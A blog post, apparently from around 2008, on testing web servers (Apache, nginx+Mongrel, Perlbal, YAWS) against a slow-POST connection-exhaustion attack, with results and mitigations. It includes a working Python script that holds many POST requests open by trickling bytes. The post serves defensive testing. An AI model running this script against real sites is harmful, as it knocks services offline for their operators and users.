This is probably old news to anyone who's run anything spammable on the web for long enough, but there are bots out there that don't do HTTP particularly well. I had this problem with the Topic Exchange years ago and it just recently hit a couple of BBM's sites. It's now fixed (for some definition of "fixed") in both cases with a Python proxy I wrote to buffer uploads and responses.
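For the curious, the core idea behind such a buffering proxy is easy to sketch in Python. This is a minimal illustration of the approach, not my actual proxy; the backend address and function names are made up:

```python
import socket

BACKEND = ("127.0.0.1", 8080)  # hypothetical backend address

def content_length(headers):
    """Pull Content-Length out of raw request headers (0 if absent)."""
    for line in headers.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1])
    return 0

def read_full_request(conn):
    """Read the headers and the *entire* body from the client before
    touching the backend, so a slow uploader ties up only one cheap
    socket here instead of a heavyweight backend process."""
    data = b""
    while b"\r\n\r\n" not in data:
        chunk = conn.recv(4096)
        if not chunk:
            return None
        data += chunk
    head, _, body = data.partition(b"\r\n\r\n")
    while len(body) < content_length(head):
        chunk = conn.recv(4096)
        if not chunk:
            return None
        body += chunk
    return head + b"\r\n\r\n" + body

def handle(client):
    request = read_full_request(client)
    if request is not None:
        backend = socket.create_connection(BACKEND)
        backend.sendall(request)
        # ...then buffer the backend's response the same way
        # and write it back to the client.
```

The point is simply that nothing gets forwarded until the whole request has arrived, so a client dribbling bytes in slowly costs you one socket, not one Apache child.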
Curious whether other "standard solutions" out there handle this situation, and wanting to test my proxy, I wrote a script that makes many HTTP connections to a site, writes POST headers with a large Content-Length, then feeds a byte into each connection every now and then so it doesn't time out, but never actually finishes the POST.
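In case it's useful to anyone testing their own servers, the guts of such a script look something like this. This is a rough Python sketch, not the script itself; the host, port, and connection count are placeholders, and you should only point it at machines you own:

```python
import socket
import time

TARGET_HOST = "localhost"  # placeholder: a test box you own
TARGET_PORT = 80
NUM_CONNECTIONS = 200      # placeholder: "many"

def build_slow_post(host, claimed_length=1000000):
    """POST headers claiming a large body that we never intend to finish."""
    return (
        "POST / HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %d\r\n"
        "\r\n" % (host, claimed_length)
    ).encode("ascii")

def attack(host, port, n):
    socks = []
    for _ in range(n):
        s = socket.create_connection((host, port))
        s.sendall(build_slow_post(host))
        socks.append(s)
    # Trickle a byte into each connection periodically so the server's
    # request timeout never fires -- but the POST never completes.
    while True:
        for s in socks:
            s.sendall(b"x")
        time.sleep(10)

# attack(TARGET_HOST, TARGET_PORT, NUM_CONNECTIONS)  # uncomment to run (loops forever)
```

Each connection costs the attacker one socket and a byte every few seconds; what it costs the server is the interesting part.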
It took down my development box within seconds, driving it so badly out of memory that the Linux OOM killer kicked in and tore the thing to shreds. Reducing MaxClients in the Apache config improved the situation to the point where the machine would stay up, but the script would still make the site inaccessible (and fill up the accept queue, so that nobody would be able to get in even if a request ever did get fully posted). Apache stops accepting requests when it runs out of children, so the script just started getting rejected connections after a while. Killing the script (and closing all the sockets) resulted in the site being instantly accessible again.
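For reference, MaxClients lives in httpd.conf; with the prefork MPM it caps the number of child processes, and hence how much memory a flood of held-open connections can pin down. The value here is just an example, and of course every held connection still occupies a child:

```apache
# httpd.conf (Apache 2.x, prefork MPM) -- illustrative value
<IfModule prefork.c>
    MaxClients 64
</IfModule>
```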
Trying it out with my proxy in front, I ran it for a few minutes but killed it after it established lots of HTTP connections without affecting the site. My proxy's not particularly clever so you could cause the machine to run out of swap by feeding it gigabytes of data, but it seems fine with lots of connections, at least.
Testing it on a Rails site running on a Mongrel cluster behind nginx gave similar results: no memory exhaustion (as no child processes are spawned with Mongrel/nginx) but an inaccessible site. Interestingly, the site didn't come back for a few minutes after killing the script; nginx or Mongrel took a while to process all the disconnects, or something. Correction: nginx handled the attack flawlessly. I didn't realise, but in the first test there was actually a different proxy in front of nginx, which wasn't so well behaved. So Rails hackers running nginx+mongrel_cluster can rest easy; your sites are probably not susceptible to this!
One bit of software I thought would be able to take a beating without batting an eyelash is Perlbal. And it did... to a point. It seems to use quite a lot of memory per connection, and after 500 connections (at which point it was using something like 3G of virtual memory) it printed "Out of memory!" and died. This is kind of scary, as Perlbal doesn't auto-respawn by itself (at least with the provided debian/perlbal.init script). So if you're running Perlbal you might want to run it under something like supervise or monit, or just in a simple shell script like this:
while true; do
    # Config path is just an example; respawn a second after Perlbal dies.
    perlbal --config /etc/perlbal/perlbal.conf
    sleep 1
done
I've pinged the Perlbal dev list about this. (I'm sure it would be possible to get it to stop accept()ing in low-memory situations, or to have it limit the number of simultaneous connections per IP -- or, if this is a bug, to fix it.)
If anyone has a service running behind a different proxy/balancer that they wouldn't mind me running the script against, please drop me a line. Or for that matter if anyone has a web service that they're concerned is easily taken down, let me know... I'd be interested to see how resilient other proxies and web servers are.
Update: Thanks to Bruce Fitzsimons for letting me take down his 3gtelcotools.com Erlang server! New result: a fairly small web server (256M RAM, single CPU) running YAWS accepted about a thousand sockets and then died completely, as with Perlbal. The error was EMFILE: too many open files. The experiment will continue after Bruce does some tweaking :)
Update 2: Bruce upped his ulimit (the open-files limit, ulimit -n), and I have since been unable to bring his server down. So chalk this up as a success for YAWS, with appropriate configuration. (Details: it handles 3000 simultaneous connections quite happily. It appears to be forcibly closing old connections after getting > 1000 from one IP address -- or this may be a bug in my code. More results later!)
Update 3, 2008-01-04: Summary of results so far:
Apache - blocked up immediately
Squid + Apache - blocked up immediately
nginx + Mongrel - happily accepts lots of connections without service interruption
Perlbal - happily accepts lots of connections, but dies eventually due to a bug?
YAWS (Erlang) - happily accepts lots of connections without service interruption
So the safest thing to do if you're running Apache is to throw nginx in front of it. Personally I'm waiting for a Perlbal patch, then I'm going to use it, as it has some cool features and looks very debuggable.
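If you do go that route, the relevant nginx configuration is just a small reverse-proxy stanza; something like the sketch below (server name, addresses, and ports are illustrative). The reason it helps is that nginx reads the whole request from the client before passing it to the backend, so a slow POST never occupies an Apache child:

```nginx
server {
    listen 80;
    server_name example.com;  # illustrative

    location / {
        # nginx buffers the full request from the client first,
        # so slow uploaders never tie up an Apache child.
        proxy_pass http://127.0.0.1:8080;  # Apache listening locally
        proxy_set_header Host $host;
    }
}
```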